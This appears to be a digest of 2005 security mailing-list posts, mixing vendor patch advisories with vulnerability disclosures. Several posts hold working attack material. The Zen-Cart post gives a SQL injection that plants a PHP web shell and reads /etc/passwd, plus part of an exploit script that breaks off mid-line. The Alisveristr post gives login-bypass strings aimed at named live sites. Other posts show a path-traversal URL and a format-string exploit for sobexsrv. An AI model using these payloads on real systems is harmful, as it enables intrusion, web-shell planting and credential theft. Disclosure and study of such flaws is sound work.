more MD5 colliding examples

[Gerardo Richarte]

hello everybody, last month we presented in a lightning talk at PacSec
a few interesting and somehow new things related to MD5 collisions: 2
different Win32 .EXE files with the same MD5 hash, and 4 different files
(inputs) with the same MD5 hash.

These are direct results of reimplementing the already known attacks on
MD5, specifically abusing the fact that collisions can be generated for
arbitrary IVs.

Today we are releasing some new stuff:

- The 4 colliding files have been increased to 8 files (there is no
real limit in the number of colliding files which can be generated, this
is just an example of what can be done).

- Two new Win32 .EXE files, this time with the same MD5 hash and also
the same CRC32, the same checksum 32 and the same checksum 16.

Of course all this is no big theoretical breakthrough, but it's somehow
interesting to have examples to show to the incredulous.

All the information (the files and presentation explaining how to
regenerate the files) from PacSec is now available at
http://www.corest.com/corelabs/projects/research_topics.php.

have fun!
gera

Zen-Cart <= 1.2.6d blind SQL injection / remote commands execution:

[retrogod]

Zen-Cart <= 1.2.6d blind SQL injection / remote commands execution:

software:
site: http://www.zencart.com/
description:"Zen Cart™ truly is the art of e-commerce; a free,user-friendly,
 open source shopping cart system. The software is   being developed
 by group of like-minded shop owners,   programmers,  designers, and
 consultants  that  think  e-commerce could  be and  should  be done
 differently.[..]"



i) blind SQL INJECTION -> remote commmands/code execution

vulnerable code in admin/password_forgotten.php:

...
if (isset($_POST['submit'])) {

  if ( !$_POST['admin_email'] ) {
$error_check = true;
$email_message = ERROR_WRONG_EMAIL_NULL;
  }

  $admin_email = zen_db_prepare_input($_POST['admin_email']);

  $sql = "select admin_id, admin_name, admin_email, admin_pass from " . 
TABLE_ADMIN . " where admin_email = '" . $admin_email . "'";
...

if magic_quotes_gpc both on & off
you can post an e-mail like this to create a shell:

'UNION SELECT 0,0,'',0 INTO OUTFILE 
'[full_application_path]shell.php' FROM admin/*

so query become:

select admin_id, admin_name, admin_email, admin_pass from admin where 
admin_email = ''UNION SELECT
0,0,'',0 INTO OUTFILE 
'[full_application_path]shell.php FROM admin/*'

and after launch commands:

http://[target]/[path]/shell.php?cmd=cat%20/etc/passwd

this is my proof of concept exploit:

http://rgod.altervista.org  #
#  #
#  -> this works with magic_quotes_gpc both on & off   #
#  #
#  usage: launch from Apache, fill in requested fields, then go!   #
#  #
#  Sun-Tzu: "With his forces intact he will dispute the mastery#
#  of the Empire, and thus, without losing a man, his triumph  #
#  will be complete. This is the method of attacking by stratagem."#

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);

echo'Zen-Cart<=1.2.6d blind SQL injection/ remote cmmnds xctn

 body {background-color:#11;   SCROLLBAR-ARROW-COLOR:
#ff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FF   !important}  input  {background-color:#303030
!important} option {  background-color:   #303030   !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}checkbox
{background-color: #303030 !important} select {font-weight: normal;   color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt   !important;
background-color:   #11;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em!important} h3 {font-size: 0.8em
!important} h4,h5,h6{font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}-->
Zen-Cart<=1.2.6d blind SQL injection/ remote cmmnds xctna
script  by  rgod  athttp://rgod.altervista.org"target="_blank";>
http://rgod.altervista.org   * hostname (ex:www.sitename.com)
   * path (ex:
/zencart/ or just / )   * specify a command full application path  (ex:
"/www/zencart/", "../../www/zencart/","c:\www\zencart\" ), if not specified,  we
will try to disclose the path 
specify  a  port   other than  80 ( default  value )
  sendexploit
through an  HTTP proxy (ip:port) ';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
 $ji=0;
 $ci++;
 echo "  ";
 for ($li=0; $li<=15; $li++)
  { echo "".$headeri[$li+$ki]."";
}
$ki=$ki+16;
echo "";
}
if (strlen($datai)==1) {echo "0".$datai."";} else
{echo "".$datai." ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
  { echo "  ";
   }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
  { echo "".$headeri[$li]."";
}
echo "";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}

eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities

[tommie1]

eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities

http://www.phpbbstyles.com/

Description
===
These vulnerabilities could allow an attacker that has gained
administrative access view file content on the system.

1. Remote File Content Disclosure
===
In xs_edit.php, the "edit" request field is not properly sanitized.

2. Full Path Disclosure
===
In xs_edit.php, the "viewbackup" request field is not properly sanitized.

Proof of Concept

1. http://forum/admin/xs_edit.php?edit=../../../../etc/passwd
2. http://forum/admin/xs_edit.php?edit=&viewbackup=1

--
http://wtf.bz/

PHP-Fusion v6.00.109 SQL Injection and Info. Disclosure

[xer0x . west]

In the latest version of PHP-Fusion, the content management system by 
Digitanium (php-fusion.co.uk), there is an SQL Error in messages.php that 
reveals path names and a table name, and someone could possibly manipulate the 
SQL database.
The error is as follows, it is with the Search and Sort option:
/messages.php?folder=inbox&srch_text=a&srch_type=blehblahbleh&sort_type=blahblehblah&srch_submit=Search%20/%20Sort
The query above will give the following error (or something to the effect):


You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'LIKE 'a'' at line 1
Warning: mysql_result(): supplied argument is not a valid MySQL result resource 
in c:\WWW\removed\data\maincore.php on line 111
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'LIKE 'a'' at line 1You 
have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'LIKE 'a' ORDER BY 
message_read, LIMIT 0,20' at line 1
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result 
resource in c:\WWW\removed\data\maincore.php on line 116
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'LIKE 'a' ORDER BY 
message_read, LIMIT 0,20' at line 1

The error could be used to obtain classified information about the database and 
the system, and is definitely manipulable.

-Nolan West (CNS Chemist)

DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability'

[KF (lists)]

DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string 
vulnerability'
Author: Kevin Finisterre
Vendor: http://www.mulliner.org/bluetooth/sobexsrv.php
Product: 'sobexsrv'
References: http://www.digitalmunition.com/DMA[2005-1202a].txt
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0_pre3.tar.gz

Description: 
The trifinite.blog is a weblog that is maintained by the trifinite.group. Every 
now and then 
you will find new entries there... 

Over Turkey Day I noticed a blog entry about a 'not really security related but 
very useful' 
Bluetooth application from the trifinite.group. There were actually two new 
applications but 
one jumped out at me right away. One of the apps needed hardware I did not have 
so I did not 
pay much attention to it, sobexsrv however seemed interesting. 

sobexsrv is a Bluetooth OBEX server with Bluetooth Security Mode-2 (application 
triggered 
security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath 
+ directory 
listing) and therefore is a full OBEX server. sobexsrv was designed with 
flexibility and 
security in mind...

Since I truely think Trifinite is pretty hardcore I almost didn't bother 
looking for bugs in 
this daemon. I pretty much assumed it would be rock solid. I figured if you can 
whisper at 
cars and shit you can certainly write an OBEX server. 

Being lazy I assumed that the examples from the man pages were easy enough to 
get me started 
using the sobexsrv. I quickly found that the first 2 man page examples can be 
used as examples
for triggering a format string issue.

EXAMPLES
   Simple setup using the internal mode, logging with syslog(8) and INBOX 
in /tmp.
  sobexsrv -IS -r /tmp

   Simple secure setup with chroot and Bluetooth security mode-2.
  sobexsrv -s 2 -ISR -l X -r /tmp

In both examples shown above the -S option is used to enable syslog() logging. 
A format string 
issue was located almost immediately in the syslog support for the logging 
functions. Several 
instances of user input are passed to an unformatted syslog() call when using 
dosyslog(). 

[EMAIL PROTECTED]:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin  
./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3)
./src/obexsrv.c:71: syslog(LOG_INFO, log);
...
./src/obexsrv.c:203:dosyslog("folder listing for \"%s\"\n", path, 0);
./src/obexsrv.c:290:if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:291:else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:334:if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:335:else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:356:if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:357:else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:401:dosyslog("created directory \"%s\"\n", fullpath, 0);
./src/obexsrv.c:406:dosyslog("failed to create directory \"%s\"\n", 
fullpath, 0);
...

As an example I used a windows machine with the Widcomm bluetooth stack to 
create a folder named 
"--%19$x.%20$x" on a remote host. The My Bluetooth Places icon provides 
an OBEX ftp 
interface which worked perfect for a quick verification of the bug. 

Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting...
Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory 
"/tmp//---41414141.42424242"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting...
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected

The host in this example is a PowerPC linux box so keep in mind that the x86 
offsets will differ. 

This vulnerability is pretty trivial to exploit as shown below. We run the 
server in debug mode 
so that we can see what is going on a little better. Then we exploit it with a 
scripted ussp-push. 

[EMAIL PROTECTED]:~$ sobexsrv -ISd -r /home/kfinisterre/
security: mode = 1
REQHINT - add handler for this!
CONNECT start
CONNECT ok, result = 1
CONNECT end
REQDONE
REQHINT - add handler for this!
PUT start
PUT name: 
%1997.d%27$hn%76819.d%28$hnAAA
AA
AAA
PUT length: 201
PUT body length: 201
PUT data_type 1
internal_handler: put for 
"/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAA
AA
AAA" 
length=201
PUT ok
PUT end
REQDONE
REQHINT - add handler for this!
DISCONNECT start
DISCONNECT end
uid=1000(kfinisterre) gid=1000(kfinisterre) 
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterr

QNX 4.25 suided dhcp.client binary

[lms]

Hello all,

I recently got a QNX 4.25 vmware image and i found that the dhcp.client shipped
with it is suided.

This obviously enables a normal user to control the NIC's configuration and
produce some other attacks (eg: if the system has some services which depend on
'host/ip based' authentication [NFS,NIS,rlogin, etc]).

Some vmware screenshots are available at:
http://lms.ispgaya.pt/goodies/qnx/

I havent got access to other QNX installations so, allthough the person who gave
me the image said the binary wasnt changed, can anybody else confirm this?

Best regards,
+-
| Luís Miguel Ferreira da Silva
| Unidade de Qualidade e Segurança
| Centro de Informática
| Professor Correia Araújo
| Faculdade de Engenharia da
| Universidade do Porto

binDeU1K0xu0v.bin
Description: PGP Public Key

[Updated] [FLSA-2005:166943] Updated php packages fix security issues

[Marc Deslauriers]

-
   Fedora Legacy Update Advisory

Synopsis:  Updated php packages fix security issues
Advisory ID:   FLSA:166943
Issue date:2005-12-02
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-2498 CVE-2005-3390 CVE-2005-3389
   CVE-2005-3388 CVE-2005-3353
-


-
1. Topic:

Updated PHP packages that fix multiple security issues are now
available.

PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Web server.

[Updated 2nd December 2005]
Red Hat Linux 9 packages have been updated to add missing security
patches.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

A bug was discovered in the PEAR XML-RPC Server package included in PHP.
If a PHP script is used which implements an XML-RPC Server using the
PEAR XML-RPC package, then it is possible for a remote attacker to
construct an XML-RPC request which can cause PHP to execute arbitrary
PHP commands as the 'apache' user. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CVE-2005-2498 to
this issue.

A flaw was found in the way PHP registers global variables during a file
upload request. A remote attacker could submit a carefully crafted
multipart/form-data POST request that would overwrite the $GLOBALS
array, altering expected script behavior, and possibly leading to the
execution of arbitrary PHP commands. Please note that this vulnerability
only affects installations which have register_globals enabled in the
PHP configuration file, which is not a default or recommended option.
The Common Vulnerabilities and Exposures project assigned the name
CVE-2005-3390 to this issue.

A flaw was found in the PHP parse_str() function. If a PHP script passes
only one argument to the parse_str() function, and the script can be
forced to abort execution during operation (for example due to the
memory_limit setting), the register_globals may be enabled even if it is
disabled in the PHP configuration file. This vulnerability only affects
installations that have PHP scripts using the parse_str function in this
way. (CVE-2005-3389)

A Cross-Site Scripting flaw was found in the phpinfo() function. If a
victim can be tricked into following a malicious URL to a site with a
page displaying the phpinfo() output, it may be possible to inject
javascript or HTML content into the displayed page or steal data such as
cookies. This vulnerability only affects installations which allow users
to view the output of the phpinfo() function. As the phpinfo() function
outputs a large amount of information about the current state of PHP, it
should only be used during debugging or if protected by authentication.
(CVE-2005-3388)

A denial of service flaw was found in the way PHP processes EXIF image
data. It is possible for an attacker to cause PHP to crash by supplying
carefully crafted EXIF image data. (CVE-2005-3353)

Users of PHP should upgrade to these updated packages, which contain
backported patches that resolve these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=166943

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/php-4.1.2-7.3.18.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-4.1.2-7.3.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-devel-4.1.2-7.3.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-imap-4.1.2-7.3.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-ldap-4.1.2-7.3.18.legacy.i386.rpm
http://download.fed

[OpenPKG-SA-2005.027] OpenPKG Security Advisory (php)

[OpenPKG]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html  http://www.openpkg.org
[EMAIL PROTECTED] [EMAIL PROTECTED]
OpenPKG-SA-2005.027  03-Dec-2005


Package: php
Vulnerability:   multiple ones
OpenPKG Specific:no

Affected Releases:   Affected Packages:  Corrected Packages:
OpenPKG CURRENT  <= php-4.4.0-20051004   >= php-4.4.1-20051031
OpenPKG 2.5  <= php-4.4.0-2.5.1  >= php-4.4.0-2.5.2
 <= apache-1.3.33-2.5.3  >= apache-1.3.33-2.5.4
OpenPKG 2.4  <= php-4.3.11-2.4.1 >= php-4.3.11-2.4.2
 <= apache-1.3.33-2.4.3  >= apache-1.3.33-2.4.4
OpenPKG 2.3  <= php-4.3.10-2.3.3 >= php-4.3.10-2.3.4
 <= apache-1.3.33-2.3.5  >= apache-1.3.33-2.3.6

Description:
  Multiple vulnerabilities were recently found in the PHP [1] web
  scripting language:

  1. The "exif_read_data" function in the EXIF module in PHP before
  4.4.1 allows remote attackers to cause a Denial of Service (DoS)
  through an infinite recursion via a malformed JPEG image. The
  Common Vulnerabilities and Exposures (CVE) project assigned the id
  CVE-2005-3353 [2] to the problem.

  2. A Cross-Site Scripting (XSS) vulnerability in the "phpinfo"
  function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 allows remote
  attackers to inject arbitrary web script or HTML via a crafted URL
  with a "stacked array assignment". The Common Vulnerabilities and
  Exposures (CVE) project assigned the id CVE-2005-3388 [3] to the
  problem.

  3. The "parse_str" function in PHP 4.x up to 4.4.0 and 5.x up to
  5.0.5, when called with only one parameter, allows remote attackers
  to enable the "register_globals" directive via inputs that cause a
  request to be terminated due to the "memory_limit" setting, which
  causes PHP to set an internal flag that enables "register_globals" and
  allows attackers to exploit vulnerabilities in PHP applications that
  would otherwise be protected. The Common Vulnerabilities and Exposures
  (CVE) project assigned the id CVE-2005-3389 [4] to the problem.

  4. The RFC1867 file upload feature in PHP 4.x up to 4.4.0 and 5.x up
  to 5.0.5, when "register_globals" is enabled, allows remote attackers
  to modify the "GLOBALS" array and bypass security protections of PHP
  applications via a "multipart/form-data" POST request with a "GLOBALS"
  "fileupload" field. The Common Vulnerabilities and Exposures (CVE)
  project assigned the id CVE-2005-3390 [5] to the problem.

  5. Multiple vulnerabilities in PHP before 4.4.1 allow remote
  attackers to bypass "safe_mode" and "open_basedir" restrictions
  via unknown attack vectors in the "curl" and "gd" extensions. The
  Common Vulnerabilities and Exposures (CVE) project assigned the id
  CVE-2005-3391 [6] to the problem.

  6. The additionally discovered issue CVE-2005-3392 doesn't affect PHP
  under the OpenPKG platforms.


References:
  [1] http://www.php.net/
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3353
  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3388 
  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3389 
  [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3390
  [6] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3391


For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.


-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFDkeIjgHWT4GPEy58RAr0kAKDI3vR3w7KhCg2iQ5h9au1LiYv2ogCdF4c7
IgeVMyxYVnQdAh6vmLP1kJE=
=hdmj
-END PGP SIGNATURE-

MDKSA-2005:222 - Updated mailman packages fix various vulnerabilities

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:222
 http://www.mandriva.com/security/
 ___
 
 Package : mailman
 Date: December 2, 2005
 Affected: 10.1, 10.2, 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Scrubber.py in Mailman 2.1.4 - 2.1.6 does not properly handle UTF8
 character encodings in filenames of e-mail attachments, which allows
 remote attackers to cause a denial of service. (CVE-2005-3573)
 
 In addition, these versions of mailman have an issue where the server
 will fail with an Overflow on bad date data in a processed message.
 
 The version of mailman in Corporate Server 2.1 does not contain the
 above vulnerable code.
 
 Updated packages are patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3573
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.1:
 b62f2bdad4a9295bcedec597f5479843  10.1/RPMS/mailman-2.1.5-7.5.101mdk.i586.rpm
 4ebd694b50ccbc9f2b602676840c4bc9  10.1/SRPMS/mailman-2.1.5-7.5.101mdk.src.rpm

 Mandriva Linux 10.1/X86_64:
 a887edf3dd65a418c441fae7588f7e5e  
x86_64/10.1/RPMS/mailman-2.1.5-7.5.101mdk.x86_64.rpm
 4ebd694b50ccbc9f2b602676840c4bc9  
x86_64/10.1/SRPMS/mailman-2.1.5-7.5.101mdk.src.rpm

 Mandriva Linux 10.2:
 99e3dbde709dfa5eb7bd71041adf41be  10.2/RPMS/mailman-2.1.5-15.2.102mdk.i586.rpm
 c01867687ff9c78b4c1e2da9d70c4f11  10.2/SRPMS/mailman-2.1.5-15.2.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 c66dd1916ba0d8ecf8796b1890a064fd  
x86_64/10.2/RPMS/mailman-2.1.5-15.2.102mdk.x86_64.rpm
 c01867687ff9c78b4c1e2da9d70c4f11  
x86_64/10.2/SRPMS/mailman-2.1.5-15.2.102mdk.src.rpm

 Mandriva Linux 2006.0:
 f917270b5334f62843bbdb4a06d12ae0  
2006.0/RPMS/mailman-2.1.6-6.2.20060mdk.i586.rpm
 15bc0be9373657ac39a9e3956de90801  
2006.0/SRPMS/mailman-2.1.6-6.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 e92b1dd1ae0bfe3bbc61ba5d6f3b52c3  
x86_64/2006.0/RPMS/mailman-2.1.6-6.2.20060mdk.x86_64.rpm
 15bc0be9373657ac39a9e3956de90801  
x86_64/2006.0/SRPMS/mailman-2.1.6-6.2.20060mdk.src.rpm

 Corporate 3.0:
 867bdc1fe018e94eb4d5352fc69747ae  
corporate/3.0/RPMS/mailman-2.1.4-2.5.C30mdk.i586.rpm
 572477eb207dadbabc22b0e53b0c2b2b  
corporate/3.0/SRPMS/mailman-2.1.4-2.5.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 8a4cc67f45481e9d4b25c41e80f54809  
x86_64/corporate/3.0/RPMS/mailman-2.1.4-2.5.C30mdk.x86_64.rpm
 572477eb207dadbabc22b0e53b0c2b2b  
x86_64/corporate/3.0/SRPMS/mailman-2.1.4-2.5.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDkKPamqjQ0CJFipgRAli4AKCLkrxtdpNyvYclD5KxuVVAZFAHCgCgw0NO
Uq5wc0mG0ABsi0Kyn7l6xR0=
=e/3r
-END PGP SIGNATURE-

Re: WebCalendar

[Louis Wang]

Hi, Dan:

For some vulnerability has fixed by the vendor, I have update this
vulnerability advisory, sorry for any trouble I have caused to you.


The following is the updated advisory.:

===
WebCalendar CRLF Injection Vulnerability

I. BACKGROUND
WebCalendar is a PHP application used to maintain a calendar for one
or more persons and for a variety of purposes.

II. DESCRIPTION
CRLF injection vulnerability in WebCalendar layers_toggle.php allows
remote attackers to inject false HTTP headers into an HTTP request,
via a URL containing encoded carriage return, line feed, and other
whitespace characters.

III. PUBLISH DATE
Publish Date: 2005-12-1
Update Date: 2005-12-2

IV. AUTHOR
lwang (lwang at lwang dot org)

V. AFFECTED SOFTWARE
WebCalendar version 1.0.1 and 1.1.0 are affected. Older versions are
not verified.

VI. ANALYSIS
in layers_toggle.php, parameter $ret does not validation.
if ( empty ( $error ) ) {
// Go back to where we where if we can figure it out.
if ( strlen ( $ret ) )
do_redirect ( $ret );
else if ( ! empty ( $HTTP_REFERER ) )
do_redirect ( $HTTP_REFERER );
else
send_to_preferred_view ();

Proof of Concept:
http://victim/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to]


VII. SOLUTION
Input validation will fix the bug.

VIII. ADVISORY
http://vd.lwang.org/webcalendar_crlf_injection.txt

VIII. REFERENCE
http://www.k5n.us/webcalendar.php






On 12/2/05, Daniel Bertrand <[EMAIL PROTECTED]> wrote:
>
> Hi,
>
> What is the vendor web site for this application? I need this information
> to write up this BID.
>
> Regards,
>
> Dan B.
>
>
>
>



--
Regards,
Bill Louis

Alisveristr E-Commerce Admin Login SQL İnjection

[B3g0k]

###Hi all
###B3g0k[at]hackermail.com
###Kurdish Hacker
###Special Thanx All Kurdish Hackers
###Freedom For Ocalan!!!
###---
###Alisveristr E-commerce User Login Sql İnjection
###Alisveristr E-commerce Admin Login Sql ###İnjection
###---
###Site: http://www.alisveristr.com or ###http://www.alisveris-tr.com
###
###Description: A E-Commerce scirpt it is too ###cool... :)
User login Sql İnjection:

Code 1 For User Login :

Username : ' or ''='  
Password: ' or ''='

Another User Login Sql İnjecition

Username : ' or 'a'='a
Password : ' or 'a'='a

--

Now Admin login Sql injectoin
ex: http://site.com/yonetim/default.asp
http://www.alisveristr.com/yonetim
http://www.alisveris-tr.com/yonetim

Code 1 For Admin Login 
Username : ' or ''='
Password : ' or ''='

Code 2 For Admin Login :
Username : ' or 'a'='a
Password : ' or 'a'='a

Thats it.
Contact : [EMAIL PROTECTED]
Kurdish Hacker

[OpenPKG-SA-2005.025] OpenPKG Security Advisory (perl)

[OpenPKG]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html  http://www.openpkg.org
[EMAIL PROTECTED] [EMAIL PROTECTED]
OpenPKG-SA-2005.025  03-Dec-2005


Package: perl
Vulnerability:   integer overflow, arbitrary code execution
OpenPKG Specific:no

Affected Releases:   Affected Packages:   Corrected Packages:
OpenPKG CURRENT  <= perl-5.8.7-20050921   >= perl-5.8.7-20051203
OpenPKG 2.5  <= perl-5.8.7-2.5.0  >= perl-5.8.7-2.5.1
OpenPKG 2.4  <= perl-5.8.7-2.4.0  >= perl-5.8.7-2.4.1
OpenPKG 2.3  <= perl-5.8.6-2.3.0  >= perl-5.8.6-2.3.1

Description:
  According to a security advisory from Dyad Security [0], an integer
  overflow bug exists in the Perl [1] programming language. The integer
  overflow is in the format string functionality (Perl_sv_vcatpvfn) of
  Perl and allows attackers to overwrite arbitrary memory and possibly
  execute arbitrary code via format string specifiers with large values.
  The Common Vulnerabilities and Exposures (CVE) project assigned the id
  CVE-2005-3962 [2] to the problem.


References:
  [0] http://www.dyadsecurity.com/perl-0002.html 
  [1] http://www.perl.org/
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3962


For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.


-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFDkZxrgHWT4GPEy58RAikXAKCUQaaaYqxG3+QTRQtNVL5YLXvaMgCdGZqn
MTL3qjtRNoCw7vT6iRUDRs8=
=jRTP
-END PGP SIGNATURE-

eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities

[tommie1]

Site: http://www.phpbbstyles.com/

1. Remote File Content Disclosure
http://forum/admin/xs_edit.php?edit=../../../../etc/passwd

2. Full Path Disclosure
http://forum/admin/xs_edit.php?edit=&viewbackup=1

http://wtf.bz/

Re: Re: Microsoft Windows CreateRemoteThread Exploit

[warl0ck]

You are a bit wrong q7x some firewalls
and security programs will stop you from
calling that function(and some others like that), for example the Tiny 
Personal Firewall.

MDKSA-2005:221 - Updated spamassassin packages fixes vulnerability

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:221
 http://www.mandriva.com/security/
 ___
 
 Package : spamassassin
 Date: December 2, 2005
 Affected: 10.1, 10.2, 2006.0
 ___
 
 Problem Description:
 
 SpamAssassin 3.0.4 allows attackers to bypass spam detection via an
 e-mail with a large number of recipients ("To" addresses), which 
 triggers a bus error in Perl.
 
 Updated packages have been patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3351
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.1:
 bef6bc710a84e631fdd4d4f94a86248c  
10.1/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.101mdk.i586.rpm
 6c3246d2e9860379b267593fbdd2be74  
10.1/RPMS/spamassassin-3.0.4-0.2.101mdk.i586.rpm
 75171a7044be3d193e2f9979fd991e62  
10.1/RPMS/spamassassin-spamc-3.0.4-0.2.101mdk.i586.rpm
 20f74aae0c01c0819fc0d686a2967979  
10.1/RPMS/spamassassin-spamd-3.0.4-0.2.101mdk.i586.rpm
 095c5d7c16b74e4004bf731c427c9b0f  
10.1/RPMS/spamassassin-tools-3.0.4-0.2.101mdk.i586.rpm
 c605bdcc9ac46522efaeca7e12c80949  
